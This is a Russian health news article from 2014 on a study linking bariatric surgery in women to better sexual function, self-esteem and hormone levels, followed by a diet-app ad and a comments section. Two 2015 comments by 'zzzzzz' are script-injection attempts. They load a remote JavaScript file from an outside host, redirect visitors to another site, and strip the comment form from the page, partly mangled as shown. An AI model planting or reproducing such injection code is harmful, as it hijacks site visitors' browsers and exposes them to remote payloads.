Здоровье ИНФО
Присоединяйтесь к нам:
Главная страница  >>  Наша кожа  >>  Прыщи  >>  Статьи  >>  Похудейте ради секса!  >>  Похудейте ради секса!
 
Обратная связь
 

Похудейте ради секса!

Размер шрифта
04 апреля 2014 00:00
Юрий Малышев
Здоровье инфо
Александр Чистяков
Здоровье инфо
  • google_analytics: false
  • Нравится

Ученые утверждают, что женщины после бариатрических операций помимо снижения веса получают приятнейший бонус в довесок. А именно – больше удовольствия от секса!

Похудейте ради секса!

К бариатрической хирургии относятся все оперативные вмешательства, которые направлены на борьбу с избыточным весом. Американские ученые из университета Пенсильвании пришли к выводу, что у многих женщин после таких операций повышается либидо, легче достигается сексуальное возбуждение, влагалищная смазка становится обильнее, что в совокупности приводит к увеличению удовольствия от секса.

Кроме того, изменяется гормональный профиль: в крови таких женщин обнаруживают повышенное количество половых гормонов, что указывает на потенциальное позитивное влияние снижения веса на фертильность женщины.

«Повышение качества сексуальной жизни отчасти связано с тем, как меняется самовосприятие женщин после бариатрических операций: они чувствуют себя более привлекательными, что добавляет физического и эмоционального комфорта», – утверждает Дэвид Сорвер, профессор Пенсильванского университета, ведущий автор исследования. «Воистину сексуальность является той развязкой, на которой пересекаются шоссе Физиологии и проспект Психологии».

Авторы отмечают, что примерно половина женщин, обращающихся за помощью к бариатрическим хирургам, жалуются на сексуальную дисфункцию в той или иной степени.

В исследовании приняли участие 106 женщин со средним индексом массы тела (ИМТ) 44,5 (ИМТ>40 считается признаком предельного ожирения), каждая из которых успешно пережила бариатрическое вмешательство: 85 выполнили шунтирование желудка, 21 – бандажирование.

После операции женщины в среднем похудели на 32,7% к концу первого года и на 33,5% - к концу второго.

Спустя двенадцать месяцев после вмешательства женщины начали отмечать улучшения и в сексуальной сфере. Кроме того, у большинства пациентов повысилась самооценка и почти исчезли депрессивные эпизоды.

Ученые подчеркивают: вышеописанные положительные изменения начали проявляться еще до достижения женщинами целевого значения ИМТ.

«Связан ли этот позитивный эффект с изменениями гормонального профиля, или же это следствие чисто психологических процессов? Или, быть может, имеет место комбинация этих факторов? Будем искать ответы на эти вопросы», – говорит Сорвер.

Любопытно, что женщины с самым отвратительным сексом ДО операции констатировали в итоге наиболее выраженные изменения в лучшую сторону.

Эксперты подчеркивают, что необходимы дальнейшие исследования в этой области, с более обширной выборочной совокупностью.

Кроме того, необходимо исследовать аналогичную взаимосвязь среди мужчин. Хотя скорее всего, у представителей сильного пола навряд ли выявится столь же радужная картина с учетом того, что ожирение нередко приводит к необратимым изменения в тканях полового члена и  кровеносных сосудах.

Тем не менее, совершенно очевидно, что снижение веса если и повлияет на погоду в вашей спальне, то исключительно в сторону снижения осадков и повышения тепла.

Похудейте ради своих любимых с «Диетой Елены Малышевой»! Теперь худеть стало еще проще с новым приложением для мобильных телефонов – скачайте бесплатно прямо сейчас!

  • google_analytics: false
  • Нравится
Послать другу Послать другу Распечатать Распечатать Обсудить на форуме Обсудить на форуме
Комментарии

1 - Гость

05 апреля 2014 в 13:07

Комментарий удален за нарушение Правил общения

2 - zzzzzz

30 июня 2015 в 18:43

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js">

3 - zzzzzz

30 июня 2015 в 22:41

Цитировать   |   Пожаловаться

--> src="http://1212123.esy.es/q.js"> > window.location.href="http://a25832-hostde3.fornex.org/"; $("form.noprint, #CommentsBlock").remove();

Статьи

       
В новый год – с новым весом!   Сколько надо сбросить, чтобы не заболеть раком! Ответ в конце статьи!   Как воспитывать ребенка, чтобы он не был толстым?   Старт нового сезона проекта «Сбрось лишнее»  
11 октября 2013Елена Малышева расскажет все о том, как правильно худеть 31 мая 2013От инфаркта не убежать, но можно уйти! Новые данные говорят о том, что ходьба также эффективна, как бег, в борьбе с лишним весом!
 
21 мая 2013Когда я ем – я глух и нем! Ученые доказали, что это поможет похудеть! 05 июля 2013Вы не виноваты в своем лишнем весе! Еда всего лишь одна из причин ожирения! Какая же главная?
 

Слайдшоу

1
5 причин заняться сексом прямо сейчас
Как похудеть, ничего не делая
Как натренировать волю и похудеть?

Тесты

1
Будет ли у вас инфаркт?
Кофеин вызывает зависимость?
Какое мороженное съесть, чтобы похудеть
Вопросы и ответы
Яна Александровна Юцковская
Яна Александровна Юцковская Задать вопрос
Посмотреть информацию о враче

Юцковская Яна Александровна, д.м.н., профессор, зав. кафедрой дерматовенерологии и косметологии ГБОУ ВПО «ТГМУ Минздрава России», врач высшей категории, директор ООО «Профессорская клиника Юцковских», Владивосток, директор ООО «Клиника профессора  Юцковской», Москва, президент НП «ДВАЭМ», председатель Дальневосточного отделения МООСБТ.

Елена Николаевна Волкова
Елена Николаевна Волкова Прочитать ответы
Посмотреть информацию о враче

Доктор медицинских наук, профессор кафедры дерматовенерологии Московского факультета ГОУ ВПО «РГМУ им. Н.И. Пирогова Минздравсоцразвития России». Этот консультант отвечал на вопросы пользователей с 03 ноября 2011 г. по 15 февраля 2012 г.